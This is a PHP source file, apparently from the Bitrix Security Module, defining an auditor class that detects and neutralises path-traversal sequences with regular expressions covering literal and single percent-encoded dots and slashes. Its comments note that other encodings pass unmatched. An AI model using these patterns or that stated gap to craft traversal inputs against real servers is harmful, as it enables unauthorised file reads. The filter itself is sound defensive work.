<?php
/**
 * Bitrix Security Module
 * @package Bitrix
 * @subpackage Security
 * @copyright 2001-2013 Bitrix
 * @since File available since 14.0.0
 */
namespace Bitrix\Security\Filter\Auditor;

/**
 * Path security auditor.
 *
 * Builds the search/replace tables used to spot "path traversal"-like
 * strings, for example: /foo/../bar/
 *
 * Coverage note: the patterns below recognise the literal characters
 * ".", "/" and "\" and their single percent-encoded forms (%2e, %2f, %5c,
 * matched case-insensitively). Input in any other encoding is not matched
 * here, so this auditor should be treated as one layer only; code that
 * opens files should still canonicalise the path and check it against an
 * allowed base directory.
 *
 * @package Bitrix\Security\Filter\Auditor
 * @since 14.0.0
 */
class Path extends Base
{
	// NOTE(review): the label is 'PHP' although this class audits paths;
	// confirm this is intentional before relying on it in logs or events.
	protected $name = 'PHP';

	/**
	 * Returns the regular expressions of this auditor and their replacements.
	 *
	 * @return array Two entries: 'search' holds the list of patterns,
	 *               'replace' holds the same patterns mapped to their
	 *               replacement strings, in the same order.
	 */
	protected function getFilters()
	{
		// Replacement for the first pattern, which has two capture groups
		// (separator + dot, then dot + separator). The helper is inherited;
		// presumably it keeps both groups but splits them apart - confirm in Base.
		$traversalReplacement = $this->getSplittingString(2);

		// When PHP_OS is undefined or starts with "WIN", the separator class
		// also contains space (\x20), double quote (\x22), "<" (\x3c) and
		// ">" (\x3e); elsewhere only "/" and "\" count as separators.
		$isWindowsLike = !defined('PHP_OS')
			|| mb_strtoupper(mb_substr(PHP_OS, 0, 3)) === 'WIN';
		$slashes = $isWindowsLike ? '\\\/\x20\x22\x3c\x3e\x5c' : '\\\/';

		// Insertion order matters: 'search' and 'replace' are paired by position.
		$filters = [
			// "<sep>." directly followed by ".<sep>", literal or percent-encoded.
			'#((?:[\\\/]|%2f|%5c)(?:\.|%2e))((?:\.|%2e)(?:[\\\/]|%2f|%5c))#is' => $traversalReplacement,
			// 30 or more consecutive "." + separator runs are collapsed to ' X '.
			'#(?:\.['.$slashes.']+){30,}#' => ' X ',
		];

		return [
			'search' => array_keys($filters),
			'replace' => $filters,
		];
	}
}